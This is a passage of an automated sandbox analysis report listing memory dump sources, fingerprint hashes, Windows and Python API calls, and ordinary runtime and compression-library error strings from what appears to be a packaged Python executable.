                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                            • Opcode ID: b22ba27cf5ec64e3c37270bb25822a4f1a3ee3e342d89922054c394a8bf0263d
                                                                                                                                                                                                            • Instruction ID: 60d9d95d3a6130d33c70eefa82176ddaa46a8fb77ca950c6324c67f5d670f9b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b22ba27cf5ec64e3c37270bb25822a4f1a3ee3e342d89922054c394a8bf0263d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2F0AF71A1F742A5EA20AB20E844339D360BF897A2FD90735D56E662F0CF2CD008C720
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
• Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AttrErr_Object_
                                                                                                                                                                                                            • String ID: fileno$fileno$fileno not available on underlying writer
                                                                                                                                                                                                            • API String ID: 4053589530-1199412483
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AttrErr_Object_
                                                                                                                                                                                                            • String ID: fileno$fileno$fileno not available on underlying writer
                                                                                                                                                                                                            • API String ID: 4053589530-1199412483
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A800419E
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A80041C3
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A8004343
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A80043BD
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A80043E0
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF8A80043EE
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$malloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2190258309-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocfreemallocmemset
                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                            • API String ID: 1719142349-2766056989
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A7AF
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A7CE
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A7F6
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A807
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A818
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A635
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A654
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A67C
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A68D
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A69E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Dealloc$Buffer_FreeMem_Release
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2882253451-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$ConditionDeleteEnterLeaveSleepVariablefree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3510912472-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$ConditionEnterVariableWake$Leave
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2469173835-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$Buffer_FreeMem_Release
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1171622071-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize$ConditionCriticalSectionVariable$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2794081246-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                            • API String ID: 1878133881-2410924014
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Format
                                                                                                                                                                                                            • String ID: could not load compression dictionary: %s$could not set compression parameters: %s
                                                                                                                                                                                                            • API String ID: 376477240-936281982
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • BrotliDecoderDecompressStream failed while finishing the stream, xrefs: 00007FF8A8188C9A
                                                                                                                                                                                                            • BrotliDecoderState is NULL while checking is_finished, xrefs: 00007FF8A8188C86
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_String
                                                                                                                                                                                                            • String ID: BrotliDecoderDecompressStream failed while finishing the stream$BrotliDecoderState is NULL while checking is_finished
                                                                                                                                                                                                            • API String ID: 1450464846-662759581
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE83BB1
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                                            • API String ID: 2581892565-1977442011
                                                                                                                                                                                                            • Opcode ID: ecd9224541c82b8805659ffed1dacaf8541a9c5a4d14f69c88a104199cf53391
                                                                                                                                                                                                            • Instruction ID: 48750158458a96614d5e4ad0da3891a20209eeadcb22764970ab13a75f23468c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecd9224541c82b8805659ffed1dacaf8541a9c5a4d14f69c88a104199cf53391
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B701D870B1E3C2B4FA61B714D9063B5B281AF18786FC64031D80EA62B6EE5CE5548720
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PyEval_SaveThread.PYTHON38(?,?,?,?,?,?,?,?,?,00007FF8A7FF349A), ref: 00007FF8A7FFE4E5
                                                                                                                                                                                                            • PyEval_RestoreThread.PYTHON38(?,?,?,?,?,?,?,?,?,00007FF8A7FF349A), ref: 00007FF8A7FFE52A
                                                                                                                                                                                                            • PyErr_SetString.PYTHON38(?,?,?,?,?,?,?,?,?,00007FF8A7FF349A), ref: 00007FF8A7FFE54A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Eval_Thread$Err_RestoreSaveString
                                                                                                                                                                                                            • String ID: could not create decompression dict
                                                                                                                                                                                                            • API String ID: 695671107-787835636
                                                                                                                                                                                                            • Opcode ID: b0ff333fe35cb93d77ab09c63954792cbf1d25646341036cf9c7d81ec24ac140
                                                                                                                                                                                                            • Instruction ID: 0b67c679dfa44c20fc819fba4813d115b437e38deb9c6d18f49bf60979151a9a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0ff333fe35cb93d77ab09c63954792cbf1d25646341036cf9c7d81ec24ac140
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F013931A0AE42E2EA518F25F94436923B1FB54BD4F401231DA4D47694EF3CE0B68714
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Size$Arg_CallMethod_Object_ParseTuple_
                                                                                                                                                                                                            • String ID: OOO:__exit__$close
                                                                                                                                                                                                            • API String ID: 1059921960-2153562444
                                                                                                                                                                                                            • Opcode ID: 51772226df014e327d83b06f6c3363231292b2bf711aefd4f77b23cc58841b78
                                                                                                                                                                                                            • Instruction ID: e2f4058295eb1846346f973c40fbb48e60965b57b85ce140ff89be804cbe6e05
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51772226df014e327d83b06f6c3363231292b2bf711aefd4f77b23cc58841b78
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5F06DA1B1AB46A2EF458F65E8406A533A0FF54BC0F484232CD0E437A4DF3CE6A5C714
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • cannot call flush() before consuming output from previous operation, xrefs: 00007FF8A7FFE975
                                                                                                                                                                                                            • cannot call flush() after compression finished, xrefs: 00007FF8A7FFE952
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CallErr_ObjectObject_String
                                                                                                                                                                                                            • String ID: cannot call flush() after compression finished$cannot call flush() before consuming output from previous operation
                                                                                                                                                                                                            • API String ID: 59860960-801479208
                                                                                                                                                                                                            • Opcode ID: 212e47e430bc2d926ec041e93e1dceacba0356f9fe499d936cfa0916138b1330
                                                                                                                                                                                                            • Instruction ID: eb68e526cd8af65569c6a5f050fa7ac9c67820b7c1d1f4c43f56c97f3f9a6769
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 212e47e430bc2d926ec041e93e1dceacba0356f9fe499d936cfa0916138b1330
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFF0F961A0AA02A1FF648F64D84537833E0EF54B85F584135C51D0A2E4DFBCA6EAD724
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • cannot call finish() before consuming output from previous operation, xrefs: 00007FF8A7FFE9E5
                                                                                                                                                                                                            • cannot call finish() after compression finished, xrefs: 00007FF8A7FFE9C2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CallErr_ObjectObject_String
                                                                                                                                                                                                            • String ID: cannot call finish() after compression finished$cannot call finish() before consuming output from previous operation
                                                                                                                                                                                                            • API String ID: 59860960-3608301232
                                                                                                                                                                                                            • Opcode ID: a8b01dddda80718a8da7875e843859b80ffecd0882e156c7dca617638283ca2f
                                                                                                                                                                                                            • Instruction ID: 2eab238fd9dc66a8cea16e0b8f3ade9e9c7cfc778f181a2aefedde05cc296be4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8b01dddda80718a8da7875e843859b80ffecd0882e156c7dca617638283ca2f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FCF0F961E0AA02A1EF648F24D88537823A0FF54B95F594131C54D0A2E4DFBC95EAC724
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_String
                                                                                                                                                                                                            • String ID: cannot __enter__ multiple times$stream is closed
                                                                                                                                                                                                            • API String ID: 1450464846-1434507833
                                                                                                                                                                                                            • Opcode ID: 57029dde13698c2cb0512c99fd5503e7ce4736fddfe9f1c476bbf37bc2f7fe47
                                                                                                                                                                                                            • Instruction ID: d227337ed9e5b83c2e30fcf5358f84186e3d0b5186e82278f6a0d66be8d1b811
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 57029dde13698c2cb0512c99fd5503e7ce4736fddfe9f1c476bbf37bc2f7fe47
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DEF03A61E06A03A2EF148B29D88526427E0FB49B88F910531C50C462A0DF7DD59BC314
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_String
                                                                                                                                                                                                            • String ID: cannot __enter__ multiple times$stream is closed
                                                                                                                                                                                                            • API String ID: 1450464846-1434507833
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,00000001,00007FF8A8067D30), ref: 00007FF8A8068059
                                                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,00000001,00007FF8A8067D30), ref: 00007FF8A806808E
                                                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,00000001,00007FF8A8067D30), ref: 00007FF8A80680C0
                                                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,00000001,00007FF8A8067D30), ref: 00007FF8A80680E4
                                                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,00000001,00007FF8A8067D30), ref: 00007FF8A8068173
                                                                                                                                                                                                            Memory Dump Source
